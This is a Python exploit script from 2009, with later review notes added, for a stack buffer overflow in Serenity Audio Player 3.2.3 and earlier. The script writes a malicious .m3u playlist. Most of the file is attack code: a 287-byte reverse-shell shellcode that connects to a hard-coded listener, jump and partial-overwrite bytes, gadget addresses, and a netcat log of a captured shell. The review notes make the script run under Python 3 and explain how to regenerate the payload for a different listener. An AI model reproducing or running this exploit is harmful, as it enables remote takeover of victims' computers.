
serenityaudio-overflow.txt

Posted on 25 November 2009

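#!/usr/bin/python
#
# ######################################################################
#
# Exploit Title  : Serenity Audio Player Playlist (.m3u) BOF
# Author         : mr_me
# Author contact : seeleymagic[at]hotmail[dot]com
# Date           : nov 24th, 2009
# Type           : local and remote code execution
# OS             : Windows XP sp3
# Product        : Serenity Audio Player
# Version        : <= 3.2.3
# Download       : http://malsmith.kyabram.biz/serenity/
#
# ######################################################################
#
# Description:
#
# Serenity is a playlist based audio player for Windows. It features a clean
# and simple interface with minimal overhead. Formats supported are limited
# only by CODECs and drivers installed on the machine.
#
# See the kind of p/p/r I have to deal with ? :P
#
# 0x004040e7 pop esi; pop ebp; retn 0x0010
# 0x00404482 pop esi; pop ebp; retn 0x0010
# 0x00404c95 pop ebx; pop ebp; retn 0x0010
# 0x00404dd3 pop edi; pop esi; retn 0x0004
# 0x004054cb pop esi; pop ebx; retn 0x0004
# 0x00405543 pop edi; pop esi; retn 0x0004
# 0x0040558b pop esi; pop ebx; retn 0x0008
# 0x00405641 pop esi; pop ebp; retn 0x0008
# 0x004057af pop ebp; pop ebx; retn 0x0008
# 0x00405855 pop ebx; pop ebp; retn 0x0014
# 0x00405bee pop esi; pop ebx; retn 0x0004
#
# Visit corelanc0d3r's blog: http://www.corelan.be:8800/
#
# mrme@home:~/serenity$ nc -lvp 4444
# listening on [any] 4444 ...
# 192.168.2.13: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.14] from (UNKNOWN) [192.168.2.13] 3761
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Serenity>
#
# windows/shell_reverse_tcp - 287 bytes
# http://www.metasploit.com
# LHOST=192.168.2.14, EXITFUNC=seh, LPORT=4444
#
# ######################################################################
#
# Review notes (not part of the original advisory):
#
#  * The playlist is written in binary mode ("wb") from a bytes object. The
#    original opened it in text mode ("w"): under Python 3 every character
#    >= 0x80 in the payload would be encoded (typically as UTF-8) into more
#    than one byte, and on Windows the text layer translates newlines, either
#    of which silently shifts the byte layout the 992-byte offset depends on.
#    The code below runs unchanged on Python 2.6+ and Python 3.
#  * The shellcode calls back to a hard-coded listener. The header's
#    LHOST/LPORT (192.168.2.14:4444) appear in the bytes as
#    "\x68\xc0\xa8\x02\x0e" (push 0x0e02a8c0) and "\x66\x68\x11\x5c"
#    (push 0x5c11); regenerate the payload for a different listener rather
#    than patching those bytes by hand.
#  * All addresses are specific to the Serenity <= 3.2.3 image on XP SP3 as
#    stated above. The generated file is malicious by design - build and open
#    it only in an isolated lab.
#

# windows/shell_reverse_tcp, 287 bytes (see header for the generator options).
SHELLCODE = (
    b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24"
    b"\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f"
    b"\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84"
    b"\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28"
    b"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"
    b"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64"
    b"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e"
    b"\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
    b"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50"
    b"\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff"
    b"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43"
    b"\x53\x43\x53\xff\xd0\x68\xc0\xa8\x02\x0e\x66\x68\x11\x5c"
    b"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a"
    b"\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50"
    b"\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95"
    b"\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
    b"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51"
    b"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05"
    b"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6"
    b"\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a"
    b"\x04\x5f\x53\xff\xd6\xff\xd0"
)

# Name of the playlist written into the current directory.
OUTPUT_FILE = "mr_me_owns_serenity.m3u"

# Bytes between the end of the "http://" prefix and the 5-byte near jump
# ("offset" in the original); the filler, NOP sled and shellcode must add up
# to exactly this many bytes.
JUMP_OFFSET = 992

# Size of the NOP sled placed directly in front of the shellcode.
NOP_SLED = 10


def build_payload():
    r"""Return the malicious playlist contents as bytes (1011 bytes total).

    Layout, offsets counted from the start of the file:

      0     "http://"                  7-byte prefix; presumably makes the entry
                                       parse as a URL - the original does not say
      7     "A" * (992 - 287 - 10)     filler (695 bytes)
      702   "\x90" * 10                NOP sled
      712   shellcode                  287 bytes
      999   "\xe9\xd4\xfe\xff\xff"     jmp rel32 -300: from 1004 back to 704,
                                       i.e. 2 bytes into the NOP sled
      1004  "\xeb\xf9\x90\x90"         jmp short -7: from 1006 back to 999,
                                       onto the near jump above
      1008  "\xe8\x47\x40"             3-byte partial overwrite; with the NUL that
                                       ends the string it reads as 0x004047e8,
                                       presumably chosen because every address in
                                       the 0x0040xxxx image contains a NUL byte

    NOTE(review): a 4-byte short jump immediately followed by a 3-byte address
    looks like an nSEH/SEH overwrite, which also matches EXITFUNC=seh in the
    header, but the original does not state this - confirm in a debugger.
    """
    filler = b"A" * (JUMP_OFFSET - len(SHELLCODE) - NOP_SLED)
    payload = b"http://"
    payload += filler
    payload += b"\x90" * NOP_SLED          # some nops just in case
    payload += SHELLCODE
    payload += b"\xe9\xd4\xfe\xff\xff"     # near jump back into the sled
    payload += b"\xeb\xf9\x90\x90"         # short jump back onto the near jump
    payload += b"\xe8\x47\x40"             # partial overwrite: 0x004047e8 after NUL
    return payload


def write_playlist(path=OUTPUT_FILE):
    """Write the payload to *path* in binary mode and return the byte count.

    Binary mode is essential: any text layer (encoding or newline
    translation) would change the byte layout and break the offsets.
    """
    payload = build_payload()
    with open(path, "wb") as fh:
        fh.write(payload)
    return len(payload)


def main():
    """Script entry point: drop the playlist in the current directory."""
    write_playlist()
    print("[+] mr_me_owns_serenity.m3u file created successfully")


if __name__ == "__main__":
    main()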

 
